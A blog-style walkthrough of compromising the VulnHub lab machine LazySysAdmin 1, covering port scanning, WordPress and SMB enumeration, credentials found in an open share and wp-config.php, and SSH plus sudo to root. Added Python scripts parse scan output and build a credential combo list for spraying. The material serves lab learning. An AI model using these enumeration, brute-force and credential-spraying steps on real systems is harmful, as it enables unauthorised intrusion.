I’ve never tried a VulnHub box before. I initially downloaded the Bulldog one but couldn’t even work out what its IP address was! LazySysAdmin 1 caught my eye. Apparently it was created after the author failed his OSCP – my kind of guy – and this one picks up DHCP OK, so I found it on 192.168.3.20.
First off, some nmapping to see what’s there:
Initial Enumeration
(makes it sound like I have a formal plan, which I don’t, but should)
root@kali2017-1:~# nmap -sS 192.168.3.20

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:22 BST
Nmap scan report for 192.168.3.20
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
MAC Address: 00:0C:29:CD:54:BA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
root@kali2017-1:~# nmap -sV 192.168.3.20

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:37 BST
Nmap scan report for 192.168.3.20
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 00:0C:29:CD:54:BA (VMware)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
So it looks like an Ubuntu box running a web server, SSH, Samba shares, a MySQL database (probably for the website) and an IRC server.
This is the bit of the process where I start to worry – lots of things there and I’m not sure which one to go for first. Starting at the top of the list: OpenSSH 6.6.1p1. Googling doesn’t offer up any obvious exploits. I’m sure there is a better way of running service versions through a tool to find these – need to find out.
Apache 2.4.7 – this has exploits by the look of it, but the site I looked at had “none” in every row of the column marked “access gained”, so that doesn’t look promising.
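The “better way” is to feed the version banners to a local exploit database such as searchsploit rather than Googling each one. The script below is an added example for this write-up (not code from the original post, nmap or exploit-db): it parses the -sV port table above, which is embedded as a constant so it runs offline, pulls out product and version, and builds the searchsploit command lines to run. Function names are my own; the searchsploit commands are produced as strings, not executed, and the major.minor truncation is a heuristic to keep searches from being too narrow.

```python
"""Turn `nmap -sV` normal output into a service list and the
searchsploit queries worth running against each fingerprinted product.

Added example for this write-up, not part of the original post, of nmap
or of searchsploit. NMAP_SV is the page's own scan result, embedded so
the script runs offline; the queries are built as strings only."""
import re
import shlex

# Constructed input: the -sV port table from the post, pasted in.
NMAP_SV = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
"""

# One port-table row: "22/tcp open ssh <version text>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# Product name followed by the first version-looking token (2.4.7, 6.6.1p1, 3.X ...).
PRODUCT_VERSION = re.compile(r"^(?P<product>[A-Za-z][\w .-]*?)\s+(?P<version>\d[\w.]*)")


def parse_nmap_sv(text):
    """Return one dict per open port: port, proto, service, raw version
    string, plus product/number when nmap fingerprinted them (else None)."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group("state") != "open":
            continue
        entry = {
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "service": m.group("service"),
            "version": m.group("version").strip(),
            "product": None,
            "number": None,
        }
        pv = PRODUCT_VERSION.match(entry["version"])
        if pv:
            entry["product"] = pv.group("product").strip()
            entry["number"] = pv.group("version")
        services.append(entry)
    return services


def short_version(number):
    """Keep only major.minor so the search is not too narrow (6.6.1p1 -> 6.6)."""
    parts = re.findall(r"\d+", number)
    return ".".join(parts[:2]) if parts else number


def searchsploit_queries(services):
    """searchsploit command lines, one per fingerprinted product, de-duplicated
    (139 and 445 both report Samba, so only one Samba query comes out)."""
    queries = []
    for s in services:
        if not s["product"]:
            continue
        q = "searchsploit " + shlex.quote(s["product"] + " " + short_version(s["number"]))
        if q not in queries:
            queries.append(q)
    return queries


def needs_manual_look(services):
    """Ports where nmap got no usable product/version: banner-grab these by hand
    (here MySQL refused us before identifying itself, and InspIRCd gave no version)."""
    return [s["port"] for s in services if not s["product"]]


if __name__ == "__main__":
    found = parse_nmap_sv(NMAP_SV)
    for q in searchsploit_queries(found):
        print(q)
    print("no version to search on, check manually:", needs_manual_look(found))
```

Run it and paste the printed lines into a Kali shell; the ports listed at the end are the ones where a manual banner grab (or, for MySQL, credentials) is the only way forward.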
So onto the website. Firefox to the IP and a site pops up. Not actually much there. Buttons don’t do anything. Links go nowhere other than a couple of external ones at the bottom of the page.
So now what? Consult my course notes. There doesn’t seem much point in using Burp as no transactions are taking place, although maybe its Spider would find things. Dirbuster seems like a better shot. Maybe there are some hidden directories and files, what with it clearly being an unfinished mock-up website. I choose the directory-list-2.3-small.txt wordlist as I don’t want to be waiting an age. It immediately starts finding an absolute shed-load of stuff.
It’s running WordPress in the /wordpress directory, we can get to phpMyAdmin (a web interface for managing MySQL databases) and there are some other folders. Visiting the site:
Is someone trying to tell us something here? Several times? And is his name togie? Jot that down as a possible username for later. Not much else to see here. Maybe give wpscan a spin with a general scan:
WPSCAN
wpscan -u 192.168.3.20/wordpress
The most interesting thing this finds is:
[!] 1 vulnerability identified from the version number
[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807
The vulnerability is that WordPress builds the sender address of the password-reset email from the Host header, so an attacker who requests a reset with a spoofed Host can have the reset mail returned to an address they control, but only if that mail bounces or gets replied to. Since this machine is on my network I’m not sure how useful that is.
wpscan -u 192.168.3.20/wordpress --enumerate u
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+---------+
    | Id | Login | Name    |
    +----+-------+---------+
    | 1  | admin | Admin – |
    +----+-------+---------+
[!] Default first WordPress username 'admin' is still used
Hooray. We have a login name: admin
wpscan offers some options, and one of them is to brute-force the login with a known username, so I try that:
wpscan --url 192.168.3.20/wordpress --wordlist /usr/share/seclists/Passwords/darkc0de.txt --username admin
That looks like it’s going to take a while and whilst it’s revving my laptop fan, I’ll see what else I can be looking into.
SAMBA shares
Time to dig out my pentesting course notes on null sessions. The first thing my notes suggest is nmblookup:
root@kali2017-1:~# nmblookup -A 192.168.3.20
Looking up status of 192.168.3.20
	LAZYSYSADMIN    <00> -         B <ACTIVE>
	LAZYSYSADMIN    <03> -         B <ACTIVE>
	LAZYSYSADMIN    <20> -         B <ACTIVE>
	WORKGROUP       <00> - <GROUP> B <ACTIVE>
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>

	MAC Address = 00-00-00-00-00-00
The <20> suffix is the File Server Service: the host called LAZYSYSADMIN is running SMB file sharing, so it is worth asking it for a share list. (<00> is the Workstation Service and <03> the Messenger Service; the suffix does not say which shares exist, only that the service is up.)
root@kali2017-1:~# smbclient -L //192.168.3.20 -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
smbclient -L lists the shares and the -N (no-pass) switch tells it not to prompt for a password, i.e. to try a null session. As a bonus, the Server=[Samba 4.3.11-Ubuntu] line is a more precise version than nmap’s “3.X - 4.X” guess.
So there is a share called “share$”. In the meantime I’ve turned off wpscan’s password brute-forcing as I’m scared my laptop will die from heat exhaustion. Now everything is strangely quiet as I pull the next tool from the badly written Word printout I’m working off:
root@kali2017-1:~# enum4linux -a 192.168.3.20
Starting enum4linux v0.8.9 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 13 10:22:10 2017

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.3.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================== 
|    Enumerating Workgroup/Domain on 192.168.3.20    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 192.168.3.20    |
 ============================================ 
Looking up status of 192.168.3.20
	LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
	LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
	LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 192.168.3.20    |
 ===================================== 
[+] Server 192.168.3.20 allows sessions using username '', password ''

 ========================================= 
|    Share Enumeration on 192.168.3.20    |
 ========================================= 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)

[+] Attempting to map shares on 192.168.3.20
//192.168.3.20/print$	Mapping: DENIED, Listing: N/A
//192.168.3.20/share$	Mapping: OK, Listing: OK
//192.168.3.20/IPC$	Mapping: OK	Listing: DENIED

 ======================================================================= 
|    Users on 192.168.3.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)
The actual output is mahoosive and I’ve stripped most of the crap away. Important things, IMO, are:
- It allows null sessions
- We can list and map share$
- There is a user called nobody (I think?)
- There is a Unix user called togie (UID 1000, so the first ordinary account created on the box)
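The nmblookup and smbclient -L steps above are the whole null-session triage, and both produce output that is easy to misread by eye. The script below is an added example for this write-up (not code from the original post or from the Samba project): it decodes the NetBIOS suffixes in nmblookup -A output and pulls the share table out of smbclient -L, using the two outputs from this box embedded as constants so it runs offline. The function names are my own, and smb_triage() is the only part that touches the network; it needs the Samba client tools installed and was not run here.

```python
"""Null-session SMB triage: decode `nmblookup -A` suffixes and parse the
anonymous `smbclient -L` share listing.

Added example for this write-up, not part of the original post or of
Samba. The two samples are the page's own tool output, embedded so the
parsing runs offline; smb_triage() is the only function that runs tools."""
import re
import subprocess

# NetBIOS name suffixes (hex) and the service each one announces.
NETBIOS_SUFFIXES = {
    "00": "Workstation Service",
    "03": "Messenger Service",
    "20": "File Server Service",
    "1b": "Domain Master Browser",
    "1d": "Master Browser",
    "1e": "Browser Service Elections",
}

# Constructed input: `nmblookup -A 192.168.3.20` as seen on this box.
NMBLOOKUP_SAMPLE = """\
Looking up status of 192.168.3.20
\tLAZYSYSADMIN    <00> -         B <ACTIVE>
\tLAZYSYSADMIN    <03> -         B <ACTIVE>
\tLAZYSYSADMIN    <20> -         B <ACTIVE>
\tWORKGROUP       <00> - <GROUP> B <ACTIVE>
\tWORKGROUP       <1e> - <GROUP> B <ACTIVE>

\tMAC Address = 00-00-00-00-00-00
"""

# Constructed input: `smbclient -L //192.168.3.20 -N` as seen on this box.
SMBCLIENT_L_SAMPLE = """\
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

\tSharename       Type      Comment
\t---------       ----      -------
\tprint$          Disk      Printer Drivers
\tshare$          Disk      Sumshare
\tIPC$            IPC       IPC Service (Web server)
"""

NMB_LINE = re.compile(
    r"^\s*(?P<name>\S+)\s+<(?P<suffix>[0-9a-fA-F]{2})>\s+-\s+(?P<group><GROUP>)?\s*B\s+<ACTIVE>"
)
SHARE_LINE = re.compile(r"^\s*(?P<name>\S+)\s+(?P<type>Disk|IPC|Printer)\s*(?P<comment>.*)$")


def parse_nmblookup(text):
    """Return [(name, suffix, is_group, service)] for every registered name."""
    out = []
    for line in text.splitlines():
        m = NMB_LINE.match(line)
        if m:
            suffix = m.group("suffix").lower()
            out.append((m.group("name"), suffix, bool(m.group("group")),
                        NETBIOS_SUFFIXES.get(suffix, "unknown")))
    return out


def file_servers(text):
    """Host names (not group names) that registered <20>, i.e. run the SMB file service."""
    return [n for n, s, g, _ in parse_nmblookup(text) if s == "20" and not g]


def parse_share_list(text):
    """Return [(sharename, type, comment)] from `smbclient -L` output."""
    shares = []
    for line in text.splitlines():
        m = SHARE_LINE.match(line)
        if m:
            shares.append((m.group("name"), m.group("type"), m.group("comment").strip()))
    return shares


def disk_shares(text):
    """Disk shares worth trying to open anonymously; print$ only holds driver files."""
    return [n for n, t, _ in parse_share_list(text) if t == "Disk" and n != "print$"]


def smb_triage(host):
    """Live version: run both tools against a host (needs nmblookup and smbclient on PATH)."""
    nmb = subprocess.run(["nmblookup", "-A", host], capture_output=True, text=True).stdout
    lst = subprocess.run(["smbclient", "-L", "//" + host, "-N"], capture_output=True, text=True).stdout
    return {"file_servers": file_servers(nmb), "disk_shares": disk_shares(lst)}


if __name__ == "__main__":
    print("file servers:", file_servers(NMBLOOKUP_SAMPLE))
    print("disk shares to try:", disk_shares(SMBCLIENT_L_SAMPLE))
```

Against this box the offline run reports LAZYSYSADMIN as the file server and share$ as the one Disk share to open; that is exactly the pair of facts the next step needs.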
My notes say we can connect to shares with smbclient \\\\host\\sharename -N, with the -N meaning null session (i.e. user/pass not required). The doubled backslashes are only there to get past the shell; smbclient //host/sharename -N does the same job.
root@kali2017-1:~# smbclient \\\\192.168.3.20\\share$ -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Aug 15 12:05:52 2017
  ..                                  D        0  Mon Aug 14 13:34:47 2017
  wordpress                           D        0  Thu Oct 12 16:23:54 2017
  Backnode_files                      D        0  Mon Aug 14 13:08:26 2017
  wp                                  D        0  Tue Aug 15 11:51:23 2017
  deets.txt                           N      139  Mon Aug 14 13:20:05 2017
  robots.txt                          N       92  Mon Aug 14 13:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 13:39:56 2017
  apache                              D        0  Mon Aug 14 13:35:19 2017
  index.html                          N    36072  Sun Aug  6 06:02:15 2017
  info.php                            N       20  Tue Aug 15 11:55:19 2017
  test                                D        0  Mon Aug 14 13:35:10 2017
  old                                 D        0  Mon Aug 14 13:35:13 2017

		3029776 blocks of size 1024. 0 blocks available
smb: \>
I’ve got an SMB session here and some files and folders, some of which are recognisable from the Dirbuster scan. So it looks like this share is the web root itself, exposed read-only to anyone. I could use smb commands like get to fetch the files but I’m gonna try Kali’s file browser first.
Fill in the server details: smb://192.168.3.20/share$ and now I’ve got a much easier way of browsing the share and it satisfies the Windows admin in me. Files first:
todolist.txt: “Prevent users from being able to view to web root using the local file browser” – it’s a bit late for that now son.
deets.txt: “CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345“
Nothing interesting in robots.txt. I try writing to the share but it’s not allowed.
But we have a password and two usernames: admin and togie. Can I log onto the share using these credentials, I wonder? Well, not sure really. Using the username togie works, but then it accepts any password, and commands to write to the share are still not allowed.
I’ll check out the folders. To cut a long story short, there is an important WordPress file called wp-config.php, which holds the database connection settings:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');
So now we have credentials for the MySQL database: Admin / TogieMYSQL12345^^. I try connecting from my Kali box but it says:
ERROR 1130 (HY000): Host '192.168.3.25' is not allowed to connect to this MySQL server
Assuming I’m not doing something wrong (ha ha, good one), it looks like remote connections are not allowed. ERROR 1130 comes from the MySQL server itself: the TCP connection was accepted (which is why nmap saw 3306 as open but could only say “unauthorized”), but MySQL accounts are user@host pairs and nothing is granted for a client coming from 192.168.3.25, most likely only 'Admin'@'localhost'. So these creds should work from a shell on the box, or through something that runs on it. Maybe the MySQL creds come in handy later. The securi-tay box used them to get root privs so you never know. Actually, Dirbuster told us about access to phpMyAdmin, which runs on the box and talks to MySQL locally, so maybe the creds come in handy there?
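Everything found so far (a user from RID cycling, a password from deets.txt, a second user and password from wp-config.php) is really one credential list to try against SSH, phpMyAdmin and the WordPress login. The script below is an added example for this write-up (not code from the original post or from WordPress): it pulls the DB_* settings out of a wp-config.php with a regex that copes with either quote style and escaped quotes, then builds the username/password pairs to try. The config text is the snippet from the share, embedded so it runs offline; the function names are my own and the pairs are only produced, not sprayed at anything.

```python
"""Extract the database credentials from a wp-config.php and combine them
with everything else gathered so far into a credential list to try.

Added example for this write-up, not part of the original post or of
WordPress. WP_CONFIG is the snippet from the share, embedded so this runs
offline; the username/password pairs are only produced, never tried."""
import itertools
import re

# Constructed input: the wp-config.php settings block from the share, plus one
# non-string define() to show that it is ignored.
WP_CONFIG = """<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
/** MySQL hostname */
define('DB_HOST', 'localhost');
define( "WP_DEBUG", false );
"""

# define('NAME', 'value') with either quote style, optional spaces, and
# backslash-escaped quotes inside the value (a real password may contain them).
DEFINE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[A-Z0-9_]+)\1\s*,\s*(['"])(?P<value>(?:\\.|(?!\3).)*)\3\s*\)"""
)


def wp_defines(text):
    """Every string constant defined in a wp-config.php, with PHP escapes undone."""
    return {
        m.group("name"): m.group("value").replace("\\'", "'").replace('\\"', '"')
        for m in DEFINE.finditer(text)
    }


def db_credentials(text):
    """The four DB_* values; DB_HOST defaults to localhost as WordPress does."""
    d = wp_defines(text)
    return {
        "user": d.get("DB_USER"),
        "password": d.get("DB_PASSWORD"),
        "database": d.get("DB_NAME"),
        "host": d.get("DB_HOST", "localhost"),
    }


def credential_candidates(usernames, passwords):
    """Every (user, password) pair to try on the other services, with a
    lower-cased variant of each username added because Unix logins are
    case-sensitive ('Admin' in MySQL is 'admin' in WordPress)."""
    users = []
    for u in usernames:
        for variant in (u, u.lower()):
            if variant not in users:
                users.append(variant)
    return list(itertools.product(users, passwords))


if __name__ == "__main__":
    creds = db_credentials(WP_CONFIG)
    gathered_users = ["togie", "admin", creds["user"]]          # RID cycling, wpscan, wp-config
    gathered_passwords = ["12345", creds["password"]]           # deets.txt, wp-config
    for user, pw in credential_candidates(gathered_users, gathered_passwords):
        print(f"{user}:{pw}")
```

The user:pass lines it prints are in the format hydra and similar tools accept as a combo list, which is how a practitioner would actually test them rather than typing each one into ssh by hand.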
But before that, let’s try out some of these credentials on the LazySysAdmin box:
Really? That’s it? Weird. So nothing fancy with WordPress or phpMyAdmin required? I’m gonna SSH into it now simply because it’s easier to copy and paste the output into this blog:
root@kali2017-1:~# ssh togie@192.168.3.20
The authenticity of host '192.168.3.20 (192.168.3.20)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.3.20' (ECDSA) to the list of known hosts.
##################################################################################################
#                                       Welcome to Web_TR1                                       #
#                            All connections are monitored and recorded                          #
#                   Disconnect IMMEDIATELY if you are not an authorized user!                    #
##################################################################################################
togie@192.168.3.20's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
togie@LazySysAdmin:~$ ls /
bin   dev  home        lib         media  old  proc  run   srv  tmp  var
boot  etc  initrd.img  lost+found  mnt    opt  root  sbin  sys  usr  vmlinuz
togie@LazySysAdmin:~$ cd /
-rbash: cd: restricted
togie@LazySysAdmin:~$ cd root
-rbash: cd: restricted
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie# cd root
bash: cd: root: No such file or directory
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# cd ..
root@LazySysAdmin:/home# ls
togie
root@LazySysAdmin:/home# cd ..
root@LazySysAdmin:/# ls
bin   dev  home        lib         media  old  proc  run   srv  tmp  var
boot  etc  initrd.img  lost+found  mnt    opt  root  sbin  sys  usr  vmlinuz
root@LazySysAdmin:/# cd root
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851

Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie

Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~#
In a nutshell: togie’s login shell is rbash (restricted bash), which is why cd / and cd root were refused, but a restricted shell counts for nothing when the same user is in sudoers. sudo su accepted togie’s 12345 password and handed over a full root shell, and the flag was sitting in /root/proof.txt. The whole chain is one weak password, written down in a world-readable share and reused for SSH and sudo; sudo -l is the first thing to run after landing in any restricted shell, as it would have shown this straight away.